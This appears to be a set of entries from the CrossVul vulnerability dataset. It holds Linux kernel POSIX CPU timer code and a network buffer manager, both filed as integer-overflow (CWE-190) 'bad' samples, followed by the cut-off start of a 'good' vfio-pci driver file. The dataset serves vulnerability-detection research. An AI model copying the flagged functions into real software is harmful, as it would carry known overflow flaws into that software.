* and try again. (This happens when the timer is in the middle of firing.)
*/
static int posix_cpu_timer_set(struct k_itimer *timer, int timer_flags,
struct itimerspec64 *new, struct itimerspec64 *old)
{
unsigned long flags;
struct sighand_struct *sighand;
struct task_struct *p = timer->it.cpu.task;
u64 old_expires, new_expires, old_incr, val;
int ret;
WARN_ON_ONCE(p == NULL);
/*
* Use the to_ktime conversion because that clamps the maximum
* value to KTIME_MAX and avoid multiplication overflows.
*/
new_expires = ktime_to_ns(timespec64_to_ktime(new->it_value));
/*
* Protect against sighand release/switch in exit/exec and p->cpu_timers
* and p->signal->cpu_timers read/write in arm_timer()
*/
sighand = lock_task_sighand(p, &flags);
/*
* If p has just been reaped, we can no
* longer get any information about it at all.
*/
if (unlikely(sighand == NULL)) {
return -ESRCH;
}
/*
* Disarm any old timer after extracting its expiry time.
*/
lockdep_assert_irqs_disabled();
ret = 0;
old_incr = timer->it.cpu.incr;
old_expires = timer->it.cpu.expires;
if (unlikely(timer->it.cpu.firing)) {
timer->it.cpu.firing = -1;
ret = TIMER_RETRY;
} else
list_del_init(&timer->it.cpu.entry);
/*
* We need to sample the current value to convert the new
* value from relative to absolute, and to convert the
* old value from absolute to relative. To set a process
* timer, we need a sample to balance the thread expiry
* times (in arm_timer). With an absolute time, we must
* check if it's already passed. In short, we need a sample.
*/
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
cpu_clock_sample(timer->it_clock, p, &val);
} else {
cpu_timer_sample_group(timer->it_clock, p, &val);
}
if (old) {
if (old_expires == 0) {
old->it_value.tv_sec = 0;
old->it_value.tv_nsec = 0;
} else {
/*
* Update the timer in case it has
* overrun already. If it has,
* we'll report it as having overrun
* and with the next reloaded timer
* already ticking, though we are
* swallowing that pending
* notification here to install the
* new setting.
*/
bump_cpu_timer(timer, val);
if (val < timer->it.cpu.expires) {
old_expires = timer->it.cpu.expires - val;
old->it_value = ns_to_timespec64(old_expires);
} else {
old->it_value.tv_nsec = 1;
old->it_value.tv_sec = 0;
}
}
}
if (unlikely(ret)) {
/*
* We are colliding with the timer actually firing.
* Punt after filling in the timer's old value, and
* disable this firing since we are already reporting
* it as an overrun (thanks to bump_cpu_timer above).
*/
unlock_task_sighand(p, &flags);
goto out;
}
if (new_expires != 0 && !(timer_flags & TIMER_ABSTIME)) {
new_expires += val;
}
/*
* Install the new expiry time (or zero).
* For a timer with no notification action, we don't actually
* arm the timer (we'll just fake it for timer_gettime).
*/
timer->it.cpu.expires = new_expires;
if (new_expires != 0 && val < new_expires) {
arm_timer(timer);
}
unlock_task_sighand(p, &flags);
/*
* Install the new reload setting, and
* set up the signal and overrun bookkeeping.
*/
timer->it.cpu.incr = timespec64_to_ns(&new->it_interval);
/*
* This acts as a modification timestamp for the timer,
* so any automatic reload attempt will punt on seeing
* that we have reset the timer manually.
*/
timer->it_requeue_pending = (timer->it_requeue_pending + 2) &
~REQUEUE_PENDING;
timer->it_overrun_last = 0;
timer->it_overrun = -1;
if (new_expires != 0 && !(val < new_expires)) {
/*
* The designated time already passed, so we notify
* immediately, even if the thread never runs to
* accumulate more time on this clock.
*/
cpu_timer_fire(timer);
}
ret = 0;
out:
if (old)
old->it_interval = ns_to_timespec64(old_incr);
return ret;
}
static void posix_cpu_timer_get(struct k_itimer *timer, struct itimerspec64 *itp)
{
u64 now;
struct task_struct *p = timer->it.cpu.task;
WARN_ON_ONCE(p == NULL);
/*
* Easy part: convert the reload time.
*/
itp->it_interval = ns_to_timespec64(timer->it.cpu.incr);
if (!timer->it.cpu.expires)
return;
/*
* Sample the clock to take the difference with the expiry time.
*/
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
cpu_clock_sample(timer->it_clock, p, &now);
} else {
struct sighand_struct *sighand;
unsigned long flags;
/*
* Protect against sighand release/switch in exit/exec and
* also make timer sampling safe if it ends up calling
* thread_group_cputime().
*/
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
/*
* The process has been reaped.
* We can't even collect a sample any more.
* Call the timer disarmed, nothing else to do.
*/
timer->it.cpu.expires = 0;
return;
} else {
cpu_timer_sample_group(timer->it_clock, p, &now);
unlock_task_sighand(p, &flags);
}
}
if (now < timer->it.cpu.expires) {
itp->it_value = ns_to_timespec64(timer->it.cpu.expires - now);
} else {
/*
* The timer should have expired already, but the firing
* hasn't taken place yet. Say it's just about to expire.
*/
itp->it_value.tv_nsec = 1;
itp->it_value.tv_sec = 0;
}
}
static unsigned long long
check_timers_list(struct list_head *timers,
struct list_head *firing,
unsigned long long curr)
{
int maxfire = 20;
while (!list_empty(timers)) {
struct cpu_timer_list *t;
t = list_first_entry(timers, struct cpu_timer_list, entry);
if (!--maxfire || curr < t->expires)
return t->expires;
t->firing = 1;
list_move_tail(&t->entry, firing);
}
return 0;
}
static inline void check_dl_overrun(struct task_struct *tsk)
{
if (tsk->dl.dl_overrun) {
tsk->dl.dl_overrun = 0;
__group_send_sig_info(SIGXCPU, SEND_SIG_PRIV, tsk);
}
}
/*
* Check for any per-thread CPU timers that have fired and move them off
* the tsk->cpu_timers[N] list onto the firing list. Here we update the
* tsk->cputime_expires values to reflect the remaining thread CPU timers.
*/
static void check_thread_timers(struct task_struct *tsk,
struct list_head *firing)
{
struct list_head *timers = tsk->cpu_timers;
struct task_cputime *tsk_expires = &tsk->cputime_expires;
u64 expires;
unsigned long soft;
if (dl_task(tsk))
check_dl_overrun(tsk);
/*
* If cputime_expires is zero, then there are no active
* per thread CPU timers.
*/
if (task_cputime_zero(&tsk->cputime_expires))
return;
expires = check_timers_list(timers, firing, prof_ticks(tsk));
tsk_expires->prof_exp = expires;
expires = check_timers_list(++timers, firing, virt_ticks(tsk));
tsk_expires->virt_exp = expires;
tsk_expires->sched_exp = check_timers_list(++timers, firing,
tsk->se.sum_exec_runtime);
/*
* Check for the special case thread timers.
*/
soft = task_rlimit(tsk, RLIMIT_RTTIME);
if (soft != RLIM_INFINITY) {
unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
if (hard != RLIM_INFINITY &&
tsk->rt.timeout > DIV_ROUND_UP(hard, USEC_PER_SEC/HZ)) {
/*
* At the hard limit, we just die.
* No need to calculate anything else now.
*/
if (print_fatal_signals) {
pr_info("CPU Watchdog Timeout (hard): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGKILL, SEND_SIG_PRIV, tsk);
return;
}
if (tsk->rt.timeout > DIV_ROUND_UP(soft, USEC_PER_SEC/HZ)) {
/*
* At the soft limit, send a SIGXCPU every second.
*/
if (soft < hard) {
soft += USEC_PER_SEC;
tsk->signal->rlim[RLIMIT_RTTIME].rlim_cur =
soft;
}
if (print_fatal_signals) {
pr_info("RT Watchdog Timeout (soft): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGXCPU, SEND_SIG_PRIV, tsk);
}
}
if (task_cputime_zero(tsk_expires))
tick_dep_clear_task(tsk, TICK_DEP_BIT_POSIX_TIMER);
}
static inline void stop_process_timers(struct signal_struct *sig)
{
struct thread_group_cputimer *cputimer = &sig->cputimer;
/* Turn off cputimer->running. This is done without locking. */
WRITE_ONCE(cputimer->running, false);
tick_dep_clear_signal(sig, TICK_DEP_BIT_POSIX_TIMER);
}
static void check_cpu_itimer(struct task_struct *tsk, struct cpu_itimer *it,
u64 *expires, u64 cur_time, int signo)
{
if (!it->expires)
return;
if (cur_time >= it->expires) {
if (it->incr)
it->expires += it->incr;
else
it->expires = 0;
trace_itimer_expire(signo == SIGPROF ?
ITIMER_PROF : ITIMER_VIRTUAL,
tsk->signal->leader_pid, cur_time);
__group_send_sig_info(signo, SEND_SIG_PRIV, tsk);
}
if (it->expires && (!*expires || it->expires < *expires))
*expires = it->expires;
}
/*
* Check for any process-wide CPU timers that have fired and move them
* off the tsk->signal->cpu_timers list onto the firing list. Per-thread timers
* have already been taken off.
*/
static void check_process_timers(struct task_struct *tsk,
struct list_head *firing)
{
struct signal_struct *const sig = tsk->signal;
u64 utime, ptime, virt_expires, prof_expires;
u64 sum_sched_runtime, sched_expires;
struct list_head *timers = sig->cpu_timers;
struct task_cputime cputime;
unsigned long soft;
if (dl_task(tsk))
check_dl_overrun(tsk);
/*
* If cputimer is not running, then there are no active
* process wide timers (POSIX 1.b, itimers, RLIMIT_CPU).
*/
if (!READ_ONCE(tsk->signal->cputimer.running))
return;
/*
* Signify that a thread is checking for process timers.
* Write access to this field is protected by the sighand lock.
*/
sig->cputimer.checking_timer = true;
/*
* Collect the current process totals.
*/
thread_group_cputimer(tsk, &cputime);
utime = cputime.utime;
ptime = utime + cputime.stime;
sum_sched_runtime = cputime.sum_exec_runtime;
prof_expires = check_timers_list(timers, firing, ptime);
virt_expires = check_timers_list(++timers, firing, utime);
sched_expires = check_timers_list(++timers, firing, sum_sched_runtime);
/*
* Check for the special case process timers.
*/
check_cpu_itimer(tsk, &sig->it[CPUCLOCK_PROF], &prof_expires, ptime,
SIGPROF);
check_cpu_itimer(tsk, &sig->it[CPUCLOCK_VIRT], &virt_expires, utime,
SIGVTALRM);
soft = task_rlimit(tsk, RLIMIT_CPU);
if (soft != RLIM_INFINITY) {
unsigned long psecs = div_u64(ptime, NSEC_PER_SEC);
unsigned long hard = task_rlimit_max(tsk, RLIMIT_CPU);
u64 x;
if (psecs >= hard) {
/*
* At the hard limit, we just die.
* No need to calculate anything else now.
*/
if (print_fatal_signals) {
pr_info("RT Watchdog Timeout (hard): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGKILL, SEND_SIG_PRIV, tsk);
return;
}
if (psecs >= soft) {
/*
* At the soft limit, send a SIGXCPU every second.
*/
if (print_fatal_signals) {
pr_info("CPU Watchdog Timeout (soft): %s[%d]\n",
tsk->comm, task_pid_nr(tsk));
}
__group_send_sig_info(SIGXCPU, SEND_SIG_PRIV, tsk);
if (soft < hard) {
soft++;
sig->rlim[RLIMIT_CPU].rlim_cur = soft;
}
}
x = soft * NSEC_PER_SEC;
if (!prof_expires || x < prof_expires)
prof_expires = x;
}
sig->cputime_expires.prof_exp = prof_expires;
sig->cputime_expires.virt_exp = virt_expires;
sig->cputime_expires.sched_exp = sched_expires;
if (task_cputime_zero(&sig->cputime_expires))
stop_process_timers(sig);
sig->cputimer.checking_timer = false;
}
/*
* This is called from the signal code (via posixtimer_rearm)
* when the last timer signal was delivered and we have to reload the timer.
*/
static void posix_cpu_timer_rearm(struct k_itimer *timer)
{
struct sighand_struct *sighand;
unsigned long flags;
struct task_struct *p = timer->it.cpu.task;
u64 now;
WARN_ON_ONCE(p == NULL);
/*
* Fetch the current sample and update the timer's expiry time.
*/
if (CPUCLOCK_PERTHREAD(timer->it_clock)) {
cpu_clock_sample(timer->it_clock, p, &now);
bump_cpu_timer(timer, now);
if (unlikely(p->exit_state))
return;
/* Protect timer list r/w in arm_timer() */
sighand = lock_task_sighand(p, &flags);
if (!sighand)
return;
} else {
/*
* Protect arm_timer() and timer sampling in case of call to
* thread_group_cputime().
*/
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
/*
* The process has been reaped.
* We can't even collect a sample any more.
*/
timer->it.cpu.expires = 0;
return;
} else if (unlikely(p->exit_state) && thread_group_empty(p)) {
/* If the process is dying, no need to rearm */
goto unlock;
}
cpu_timer_sample_group(timer->it_clock, p, &now);
bump_cpu_timer(timer, now);
/* Leave the sighand locked for the call below. */
}
/*
* Now re-arm for the new expiry time.
*/
lockdep_assert_irqs_disabled();
arm_timer(timer);
unlock:
unlock_task_sighand(p, &flags);
}
/**
* task_cputime_expired - Compare two task_cputime entities.
*
* @sample: The task_cputime structure to be checked for expiration.
* @expires: Expiration times, against which @sample will be checked.
*
* Checks @sample against @expires to see if any field of @sample has expired.
* Returns true if any field of the former is greater than the corresponding
* field of the latter if the latter field is set. Otherwise returns false.
*/
static inline int task_cputime_expired(const struct task_cputime *sample,
const struct task_cputime *expires)
{
if (expires->utime && sample->utime >= expires->utime)
return 1;
if (expires->stime && sample->utime + sample->stime >= expires->stime)
return 1;
if (expires->sum_exec_runtime != 0 &&
sample->sum_exec_runtime >= expires->sum_exec_runtime)
return 1;
return 0;
}
/**
* fastpath_timer_check - POSIX CPU timers fast path.
*
* @tsk: The task (thread) being checked.
*
* Check the task and thread group timers. If both are zero (there are no
* timers set) return false. Otherwise snapshot the task and thread group
* timers and compare them with the corresponding expiration times. Return
* true if a timer has expired, else return false.
*/
static inline int fastpath_timer_check(struct task_struct *tsk)
{
struct signal_struct *sig;
if (!task_cputime_zero(&tsk->cputime_expires)) {
struct task_cputime task_sample;
task_cputime(tsk, &task_sample.utime, &task_sample.stime);
task_sample.sum_exec_runtime = tsk->se.sum_exec_runtime;
if (task_cputime_expired(&task_sample, &tsk->cputime_expires))
return 1;
}
sig = tsk->signal;
/*
* Check if thread group timers expired when the cputimer is
* running and no other thread in the group is already checking
* for thread group cputimers. These fields are read without the
* sighand lock. However, this is fine because this is meant to
* be a fastpath heuristic to determine whether we should try to
* acquire the sighand lock to check/handle timers.
*
* In the worst case scenario, if 'running' or 'checking_timer' gets
* set but the current thread doesn't see the change yet, we'll wait
* until the next thread in the group gets a scheduler interrupt to
* handle the timer. This isn't an issue in practice because these
* types of delays with signals actually getting sent are expected.
*/
if (READ_ONCE(sig->cputimer.running) &&
!READ_ONCE(sig->cputimer.checking_timer)) {
struct task_cputime group_sample;
sample_cputime_atomic(&group_sample, &sig->cputimer.cputime_atomic);
if (task_cputime_expired(&group_sample, &sig->cputime_expires))
return 1;
}
if (dl_task(tsk) && tsk->dl.dl_overrun)
return 1;
return 0;
}
/*
* This is called from the timer interrupt handler. The irq handler has
* already updated our counts. We need to check if any timers fire now.
* Interrupts are disabled.
*/
void run_posix_cpu_timers(struct task_struct *tsk)
{
LIST_HEAD(firing);
struct k_itimer *timer, *next;
unsigned long flags;
lockdep_assert_irqs_disabled();
/*
* The fast path checks that there are no expired thread or thread
* group timers. If that's so, just return.
*/
if (!fastpath_timer_check(tsk))
return;
if (!lock_task_sighand(tsk, &flags))
return;
/*
* Here we take off tsk->signal->cpu_timers[N] and
* tsk->cpu_timers[N] all the timers that are firing, and
* put them on the firing list.
*/
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
/*
* We must release these locks before taking any timer's lock.
* There is a potential race with timer deletion here, as the
* siglock now protects our private firing list. We have set
* the firing flag in each timer, so that a deletion attempt
* that gets the timer lock before we do will give it up and
* spin until we've taken care of that timer below.
*/
unlock_task_sighand(tsk, &flags);
/*
* Now that all the timers on our list have the firing flag,
* no one will touch their list entries but us. We'll take
* each timer's lock before clearing its firing flag, so no
* timer call will interfere.
*/
list_for_each_entry_safe(timer, next, &firing, it.cpu.entry) {
int cpu_firing;
spin_lock(&timer->it_lock);
list_del_init(&timer->it.cpu.entry);
cpu_firing = timer->it.cpu.firing;
timer->it.cpu.firing = 0;
/*
* The firing flag is -1 if we collided with a reset
* of the timer, which already reported this
* almost-firing as an overrun. So don't generate an event.
*/
if (likely(cpu_firing >= 0))
cpu_timer_fire(timer);
spin_unlock(&timer->it_lock);
}
}
/*
* Set one of the process-wide special case CPU timers or RLIMIT_CPU.
* The tsk->sighand->siglock must be held by the caller.
*/
void set_process_cpu_timer(struct task_struct *tsk, unsigned int clock_idx,
u64 *newval, u64 *oldval)
{
u64 now;
int ret;
WARN_ON_ONCE(clock_idx == CPUCLOCK_SCHED);
ret = cpu_timer_sample_group(clock_idx, tsk, &now);
if (oldval && ret != -EINVAL) {
/*
* We are setting itimer. The *oldval is absolute and we update
* it to be relative, *newval argument is relative and we update
* it to be absolute.
*/
if (*oldval) {
if (*oldval <= now) {
/* Just about to fire. */
*oldval = TICK_NSEC;
} else {
*oldval -= now;
}
}
if (!*newval)
return;
*newval += now;
}
/*
* Update expiration cache if we are the earliest timer, or eventually
* RLIMIT_CPU limit is earlier than prof_exp cpu timer expire.
*/
switch (clock_idx) {
case CPUCLOCK_PROF:
if (expires_gt(tsk->signal->cputime_expires.prof_exp, *newval))
tsk->signal->cputime_expires.prof_exp = *newval;
break;
case CPUCLOCK_VIRT:
if (expires_gt(tsk->signal->cputime_expires.virt_exp, *newval))
tsk->signal->cputime_expires.virt_exp = *newval;
break;
}
tick_dep_set_signal(tsk->signal, TICK_DEP_BIT_POSIX_TIMER);
}
static int do_cpu_nanosleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
struct itimerspec64 it;
struct k_itimer timer;
u64 expires;
int error;
/*
* Set up a temporary timer and then wait for it to go off.
*/
memset(&timer, 0, sizeof timer);
spin_lock_init(&timer.it_lock);
timer.it_clock = which_clock;
timer.it_overrun = -1;
error = posix_cpu_timer_create(&timer);
timer.it_process = current;
if (!error) {
static struct itimerspec64 zero_it;
struct restart_block *restart;
memset(&it, 0, sizeof(it));
it.it_value = *rqtp;
spin_lock_irq(&timer.it_lock);
error = posix_cpu_timer_set(&timer, flags, &it, NULL);
if (error) {
spin_unlock_irq(&timer.it_lock);
return error;
}
while (!signal_pending(current)) {
if (timer.it.cpu.expires == 0) {
/*
* Our timer fired and was reset; the
* deletion below cannot fail.
*/
posix_cpu_timer_del(&timer);
spin_unlock_irq(&timer.it_lock);
return 0;
}
/*
* Block until cpu_timer_fire (or a signal) wakes us.
*/
__set_current_state(TASK_INTERRUPTIBLE);
spin_unlock_irq(&timer.it_lock);
schedule();
spin_lock_irq(&timer.it_lock);
}
/*
* We were interrupted by a signal.
*/
expires = timer.it.cpu.expires;
error = posix_cpu_timer_set(&timer, 0, &zero_it, &it);
if (!error) {
/*
* Timer is now unarmed, deletion can not fail.
*/
posix_cpu_timer_del(&timer);
}
spin_unlock_irq(&timer.it_lock);
while (error == TIMER_RETRY) {
/*
* We need to handle the case where the timer was or is in the
* middle of firing. In all other cases we have already freed the
* resources.
*/
spin_lock_irq(&timer.it_lock);
error = posix_cpu_timer_del(&timer);
spin_unlock_irq(&timer.it_lock);
}
if ((it.it_value.tv_sec | it.it_value.tv_nsec) == 0) {
/*
* It actually did fire already.
*/
return 0;
}
error = -ERESTART_RESTARTBLOCK;
/*
* Report back to the user the time still remaining.
*/
restart = &current->restart_block;
restart->nanosleep.expires = expires;
if (restart->nanosleep.type != TT_NONE)
error = nanosleep_copyout(restart, &it.it_value);
}
return error;
}
static long posix_cpu_nsleep_restart(struct restart_block *restart_block);
static int posix_cpu_nsleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
struct restart_block *restart_block = &current->restart_block;
int error;
/*
* Diagnose required errors first.
*/
if (CPUCLOCK_PERTHREAD(which_clock) &&
(CPUCLOCK_PID(which_clock) == 0 ||
CPUCLOCK_PID(which_clock) == task_pid_vnr(current)))
return -EINVAL;
error = do_cpu_nanosleep(which_clock, flags, rqtp);
if (error == -ERESTART_RESTARTBLOCK) {
if (flags & TIMER_ABSTIME)
return -ERESTARTNOHAND;
restart_block->fn = posix_cpu_nsleep_restart;
restart_block->nanosleep.clockid = which_clock;
}
return error;
}
static long posix_cpu_nsleep_restart(struct restart_block *restart_block)
{
clockid_t which_clock = restart_block->nanosleep.clockid;
struct timespec64 t;
t = ns_to_timespec64(restart_block->nanosleep.expires);
return do_cpu_nanosleep(which_clock, TIMER_ABSTIME, &t);
}
#define PROCESS_CLOCK make_process_cpuclock(0, CPUCLOCK_SCHED)
#define THREAD_CLOCK make_thread_cpuclock(0, CPUCLOCK_SCHED)
static int process_cpu_clock_getres(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_getres(PROCESS_CLOCK, tp);
}
static int process_cpu_clock_get(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_get(PROCESS_CLOCK, tp);
}
static int process_cpu_timer_create(struct k_itimer *timer)
{
timer->it_clock = PROCESS_CLOCK;
return posix_cpu_timer_create(timer);
}
static int process_cpu_nsleep(const clockid_t which_clock, int flags,
const struct timespec64 *rqtp)
{
return posix_cpu_nsleep(PROCESS_CLOCK, flags, rqtp);
}
static int thread_cpu_clock_getres(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_getres(THREAD_CLOCK, tp);
}
static int thread_cpu_clock_get(const clockid_t which_clock,
struct timespec64 *tp)
{
return posix_cpu_clock_get(THREAD_CLOCK, tp);
}
static int thread_cpu_timer_create(struct k_itimer *timer)
{
timer->it_clock = THREAD_CLOCK;
return posix_cpu_timer_create(timer);
}
const struct k_clock clock_posix_cpu = {
.clock_getres = posix_cpu_clock_getres,
.clock_set = posix_cpu_clock_set,
.clock_get = posix_cpu_clock_get,
.timer_create = posix_cpu_timer_create,
.nsleep = posix_cpu_nsleep,
.timer_set = posix_cpu_timer_set,
.timer_del = posix_cpu_timer_del,
.timer_get = posix_cpu_timer_get,
.timer_rearm = posix_cpu_timer_rearm,
};
const struct k_clock clock_process = {
.clock_getres = process_cpu_clock_getres,
.clock_get = process_cpu_clock_get,
.timer_create = process_cpu_timer_create,
.nsleep = process_cpu_nsleep,
};
const struct k_clock clock_thread = {
.clock_getres = thread_cpu_clock_getres,
.clock_get = thread_cpu_clock_get,
.timer_create = thread_cpu_timer_create,
};
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_207_1 |
crossvul-cpp_data_bad_400_0 | /*
* Description: network buf manager
* History: yang@haipo.me, 2016/03/16, create
*/
# include <errno.h>
# include <string.h>
# include "nw_buf.h"
# define NW_BUF_POOL_INIT_SIZE 64
# define NW_CACHE_INIT_SIZE 64
size_t nw_buf_size(nw_buf *buf)
{
return buf->wpos - buf->rpos;
}
size_t nw_buf_avail(nw_buf *buf)
{
return buf->size - buf->wpos;
}
size_t nw_buf_write(nw_buf *buf, const void *data, size_t len)
{
size_t available = buf->size - buf->wpos;
size_t wlen = len > available ? available : len;
memcpy(buf->data + buf->wpos, data, wlen);
buf->wpos += wlen;
return wlen;
}
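/*
* Example (illustrative): with buf->size == 8 and buf->wpos == 6, a call to
* nw_buf_write(buf, data, 10) copies only the 2 available bytes and returns 2;
* callers are expected to check the return value and queue the remainder, as
* nw_buf_list_write() below does.
*/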
void nw_buf_shift(nw_buf *buf)
{
if (buf->rpos == buf->wpos) {
buf->rpos = buf->wpos = 0;
} else if (buf->rpos != 0) {
memmove(buf->data, buf->data + buf->rpos, buf->wpos - buf->rpos);
buf->wpos -= buf->rpos;
buf->rpos = 0;
}
}
nw_buf_pool *nw_buf_pool_create(uint32_t size)
{
nw_buf_pool *pool = malloc(sizeof(nw_buf_pool));
if (pool == NULL)
return NULL;
pool->size = size;
pool->used = 0;
pool->free = 0;
pool->free_total = NW_BUF_POOL_INIT_SIZE;
pool->free_arr = malloc(pool->free_total * sizeof(nw_buf *));
if (pool->free_arr == NULL) {
free(pool);
return NULL;
}
return pool;
}
nw_buf *nw_buf_alloc(nw_buf_pool *pool)
{
if (pool->free) {
nw_buf *buf = pool->free_arr[--pool->free];
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
nw_buf *buf = malloc(sizeof(nw_buf) + pool->size);
if (buf == NULL)
return NULL;
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
void nw_buf_free(nw_buf_pool *pool, nw_buf *buf)
{
if (pool->free < pool->free_total) {
pool->free_arr[pool->free++] = buf;
} else {
uint32_t new_free_total = pool->free_total * 2;
void *new_arr = realloc(pool->free_arr, new_free_total * sizeof(nw_buf *));
if (new_arr) {
pool->free_total = new_free_total;
pool->free_arr = new_arr;
pool->free_arr[pool->free++] = buf;
} else {
free(buf);
}
}
}
void nw_buf_pool_release(nw_buf_pool *pool)
{
for (uint32_t i = 0; i < pool->free; ++i) {
free(pool->free_arr[i]);
}
free(pool->free_arr);
free(pool);
}
nw_buf_list *nw_buf_list_create(nw_buf_pool *pool, uint32_t limit)
{
nw_buf_list *list = malloc(sizeof(nw_buf_list));
if (list == NULL)
return NULL;
list->pool = pool;
list->count = 0;
list->limit = limit;
list->head = NULL;
list->tail = NULL;
return list;
}
size_t nw_buf_list_write(nw_buf_list *list, const void *data, size_t len)
{
const void *pos = data;
size_t left = len;
if (list->tail && nw_buf_avail(list->tail)) {
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
while (left) {
if (list->limit && list->count >= list->limit)
return len - left;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return len - left;
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
return len;
}
size_t nw_buf_list_append(nw_buf_list *list, const void *data, size_t len)
{
if (list->limit && list->count >= list->limit)
return 0;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return 0;
if (len > buf->size) {
nw_buf_free(list->pool, buf);
return 0;
}
nw_buf_write(buf, data, len);
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
return len;
}
void nw_buf_list_shift(nw_buf_list *list)
{
if (list->head) {
nw_buf *tmp = list->head;
list->head = tmp->next;
if (list->head == NULL) {
list->tail = NULL;
}
list->count--;
nw_buf_free(list->pool, tmp);
}
}
void nw_buf_list_release(nw_buf_list *list)
{
nw_buf *curr = list->head;
nw_buf *next = NULL;
while (curr) {
next = curr->next;
nw_buf_free(list->pool, curr);
curr = next;
}
free(list);
}
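#if 0
/*
* Minimal usage sketch for the buffer pool/list API above (illustrative only;
* the 4096-byte buffer size and the limit of 100 queued buffers are arbitrary,
* and error handling is omitted):
*/
static void nw_buf_demo(const void *data, size_t len)
{
nw_buf_pool *pool = nw_buf_pool_create(4096);
nw_buf_list *list = nw_buf_list_create(pool, 100);
/* may return less than len if the queue limit is reached */
size_t written = nw_buf_list_write(list, data, len);
/* consume each head buffer (bytes between rpos and wpos), then drop it */
while (list->head) {
nw_buf_list_shift(list);
}
(void)written;
nw_buf_list_release(list);
nw_buf_pool_release(pool);
}
#endif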
nw_cache *nw_cache_create(uint32_t size)
{
nw_cache *cache = malloc(sizeof(nw_cache));
if (cache == NULL)
return NULL;
cache->size = size;
cache->used = 0;
cache->free = 0;
cache->free_total = NW_CACHE_INIT_SIZE;
cache->free_arr = malloc(cache->free_total * sizeof(void *));
if (cache->free_arr == NULL) {
free(cache);
return NULL;
}
return cache;
}
void *nw_cache_alloc(nw_cache *cache)
{
if (cache->free)
return cache->free_arr[--cache->free];
return malloc(cache->size);
}
void nw_cache_free(nw_cache *cache, void *obj)
{
if (cache->free < cache->free_total) {
cache->free_arr[cache->free++] = obj;
} else {
uint32_t new_free_total = cache->free_total * 2;
void *new_arr = realloc(cache->free_arr, new_free_total * sizeof(void *));
if (new_arr) {
cache->free_total = new_free_total;
cache->free_arr = new_arr;
cache->free_arr[cache->free++] = obj;
} else {
free(obj);
}
}
}
void nw_cache_release(nw_cache *cache)
{
for (uint32_t i = 0; i < cache->free; ++i) {
free(cache->free_arr[i]);
}
free(cache->free_arr);
free(cache);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_400_0 |
crossvul-cpp_data_good_5375_0 | /*
* Copyright (C) 2012 Red Hat, Inc. All rights reserved.
* Author: Alex Williamson <alex.williamson@redhat.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Derived from original vfio:
* Copyright 2010 Cisco Systems, Inc. All rights reserved.
* Author: Tom Lyon, pugs@cisco.com
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/device.h>
#include <linux/eventfd.h>
#include <linux/file.h>
#include <linux/interrupt.h>
#include <linux/iommu.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/notifier.h>
#include <linux/pci.h>
#include <linux/pm_runtime.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/uaccess.h>
#include <linux/vfio.h>
#include <linux/vgaarb.h>
#include "vfio_pci_private.h"
#define DRIVER_VERSION "0.2"
#define DRIVER_AUTHOR "Alex Williamson <alex.williamson@redhat.com>"
#define DRIVER_DESC "VFIO PCI - User Level meta-driver"
static char ids[1024] __initdata;
module_param_string(ids, ids, sizeof(ids), 0);
MODULE_PARM_DESC(ids, "Initial PCI IDs to add to the vfio driver, format is \"vendor:device[:subvendor[:subdevice[:class[:class_mask]]]]\" and multiple comma separated entries can be specified");
static bool nointxmask;
module_param_named(nointxmask, nointxmask, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(nointxmask,
"Disable support for PCI 2.3 style INTx masking. If this resolves problems for specific devices, report lspci -vvvxxx to linux-pci@vger.kernel.org so the device can be fixed automatically via the broken_intx_masking flag.");
#ifdef CONFIG_VFIO_PCI_VGA
static bool disable_vga;
module_param(disable_vga, bool, S_IRUGO);
MODULE_PARM_DESC(disable_vga, "Disable VGA resource access through vfio-pci");
#endif
static bool disable_idle_d3;
module_param(disable_idle_d3, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(disable_idle_d3,
"Disable using the PCI D3 low power state for idle, unused devices");
static DEFINE_MUTEX(driver_lock);
static inline bool vfio_vga_disabled(void)
{
#ifdef CONFIG_VFIO_PCI_VGA
return disable_vga;
#else
return true;
#endif
}
/*
* Our VGA arbiter participation is limited since we don't know anything
* about the device itself. However, if the device is the only VGA device
* downstream of a bridge and VFIO VGA support is disabled, then we can
* safely return legacy VGA IO and memory as not decoded since the user
* has no way to get to it and routing can be disabled externally at the
* bridge.
*/
static unsigned int vfio_pci_set_vga_decode(void *opaque, bool single_vga)
{
struct vfio_pci_device *vdev = opaque;
struct pci_dev *tmp = NULL, *pdev = vdev->pdev;
unsigned char max_busnr;
unsigned int decodes;
